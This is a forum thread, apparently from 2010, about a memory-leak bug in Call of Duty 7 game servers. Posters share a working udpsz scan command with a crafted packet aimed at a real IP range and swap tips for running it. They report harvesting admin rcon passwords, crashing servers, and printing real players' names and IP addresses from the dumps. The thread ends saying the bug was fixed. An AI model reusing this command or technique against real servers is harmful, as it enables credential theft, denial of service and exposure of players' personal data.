udpsz -q -l 0 -C "ffffffff 00 0000000000000000" -D -L cod7mem.dll 173.199.70-79 3074 -1 > c:\dump.txt

oh if needed I can add an option to cod7mem.dll for filtering the data to display, for example showing only the strings containing a certain keyword chosed by the user.


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 21 Nov 2010 13:01 

Joined: 09 Mar 2010 23:13
Posts: 40
ok... Firsty I'm following your advice and scan IP range

Code:
udpsz -q -l 0 -C "ffffffff 00 0000000000000000" -D -L cod7mem.dll 173.199.70-79 3074 -1 > c:\dump.txt


Some servers return info like this:

Code:
- 173.199.70.2 : 3074

DUMP:
^ 0 000 ewpew [TDM Onl
bpu# Qw


and some like this:

Code:
- 173.199.70.3 : 3074

DUMP:
11   100   46 15016536 SPAM^7         2       0 93.166.156.78:524       9386 25000
12   150  141 55265966 H3PPZ:.^7            1       0 79.102.148.137:524     27723 25000
13    50   74 45122212 Dexil (FIN)^7        1      50 62.216.125.242:524      2161 25000
114 ADMIRAL^7            2      50 82.128.203.69:524      10952 25000
17     0  999 62960474 ThE_DaRk_SiDe^7      0   21450 79.103.121.231:524    -25131 25000
18   900   69 23797756 Erandar^7            1       0 80.88.102.206:524        180 25000
41517032 kvisa^7              2       0 85.221.114.22:524      23806 25000
7    50   70 44040375 FasTerAsTa^7         1       0 81.8.241.60:524        -1344 25000
8   820   41 10088545 Neuancer^7           2      50 84.215.94.53:521430   -1233


or:

Code:
- 173.199.70.12 : 3074

DUMP:
^ 0 000 GameServers.co
bpu# Qw
dvar set sv_referencedFFNames code_pre_gfx_mp code_post_gfx_mp patch_mp common_mp mp_mountain


No one servers return to info like in your post. I mean not settings, not dvars/cvars, not any useable info (except players IP's on some servers)

My questions:

1) Why different servers return differents info ? I mean why return to me only there names and other - names and players info ?

2) If I want to get rcon/settings of specific server, I need to launch udpsz and wait before admin send packet with dvar info and then udpsz can catch it on the fly ? Am I right ?


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 21 Nov 2010 15:48 

Joined: 03 Dec 2008 18:35
Posts: 8
6 Monitoring server. During three hours. Only one returned to rcon. It works, but not for everyone. Or the time was not enough.


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 21 Nov 2010 16:32 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
Quote:
1) Why different servers return differents info ? I mean why return to me only there names and other - names and players info ?

it can depend by various reasons, obviously only having an own server locally on which making the tests could answer to more questions BUT will not change the results: this is a passive vulnerability where you don't have the control of the output so you "get" info but can't decide arbitrarily what to get.

this is important and I thought it was clear, so take it in mind.

in my opinion more info are collected when the admin or some scripts perform operations on the server and so you get parts of his results but obviously I can't confirm it... it's only a hypothesis.

Quote:
2) If I want to get rcon/settings of specific server, I need to launch udpsz and wait before admin send packet with dvar info and then udpsz can catch it on the fly ? Am I right ?

you need to launch it and waiting but nobody can say how much you need to wait because it's not a vulnerability that doesn't have a fixed and clear result, it's something like fishing on the sea where you don't know if and when you will catch something.

Quote:
Only one returned to rcon. It works, but not for everyone. Or the time was not enough.

it's all about time and maybe in some cases even the "right moment".

after all it's almost a statistic things: scanning a whole C or B range gives more interesting results than monitoring one single server.
at least this is what I noticed because, in case it wasn't clear, I almost didn't spent time and packets on this bug because I don't test things not located on my computers and even with this big limitations I casually captured highly important informations (rcon).
in this vulnerability the "luck factor" is important.

then you catched one rcon so in my opinion it's a huge positive result, moreover for a passive bug like this one.


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 21 Nov 2010 19:10 

Joined: 09 Mar 2010 23:13
Posts: 40
Now all is clear for me. Thx so much Luigi !

And I forget something. Did I need to change packet size (?) like "ffffffff 00 0000000000000000" to "ffffffff 50 0000000000000000" for example. Or first is common and right ?


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 21 Nov 2010 21:06 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
the byte at offset 4 is an opcode that has various usage, for example if it's 0x00 it's a rcon request and 2, 4, 6 and 8 information queries.
so the packet is ok as is, must not be changed.

as written in the first post and in the advisory if you modify the bytes after that 0x00 then you will receive a shorter reply and so there will be more memory bytes visible but I don't know if it gets logged or takes more attention from the admin.
but in any case it's an useless thing, so use the default packet that it's ok


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 22 Nov 2010 08:21 

Joined: 09 Mar 2010 23:13
Posts: 40
Thanks again !


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 04 Dec 2010 20:57 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
Quote:
The stuff returned changes roughly every 60 seconds and only if theres players connected


TeamRetox asked me to add this here.


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 05 Dec 2010 09:49 

Joined: 05 Dec 2010 09:46
Posts: 1
Well with my tests with this it also does a buffer overflow crashing the server forcing all players out. Shamley this has happened in all servers Iv tried it with, and yes I play on the server while its collecting that information aluigi has found.


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 15 Dec 2010 19:16 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
wow, one month and a similar public vulnerability is still unpatched.

to anyone:
if you have stories to tell post them here, they are needed mainly for statistical reasons (like success rate on X number of servers) because it's interesting from a technical point of view


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 15 Dec 2010 23:09 

Joined: 12 Dec 2010 13:33
Posts: 2
I used this for 8 hours and got 60+ rcon passwords and a whole lot of player info:
udpsz -q -l 0 -C "ffffffff 00 0000000000000000" -D -L cod7mem.dll 173.199.70-79 3074 -1 1> bodata.log


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 18 Dec 2010 00:52 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
the bug has been fixed


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 29 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: